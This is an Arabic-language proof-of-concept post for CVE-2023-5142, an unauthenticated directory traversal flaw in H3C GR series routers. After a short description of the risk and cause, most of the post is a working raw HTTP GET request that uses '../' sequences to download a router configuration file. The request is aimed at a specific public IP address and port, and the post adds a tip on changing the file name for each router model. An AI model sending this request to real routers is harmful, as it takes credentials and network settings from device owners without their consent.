
استغلال PoC لثغرة CVE-2023-5142 التي تستهدف أجهزة توجيه H3C GR عبر ثغرة اجتياز الدليل غير المصادق عليها لاستخراج ملفات الإعدادات الحساسة.
المنتج: موجه سلسلة GR
الإصدار: الكل
التصنيف: عالي الخطورة
الموقع: http://www.h3c.com/
المخاطر: يمكن للمهاجمين استغلال هذه الثغرة للحصول على معلومات حساسة من الموجهات من خلال بناء حزم طلبات خاصة لتجاوز التحقق من الهوية.
المبدأ: لم يقم الموجه بمصادقة الوصول إلى الدليل والملفات ذات الصلة
الاستغلال:
ملاحظة: من الضروري تعديل لاحقة اسم الملف في الاستغلال، مثل GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image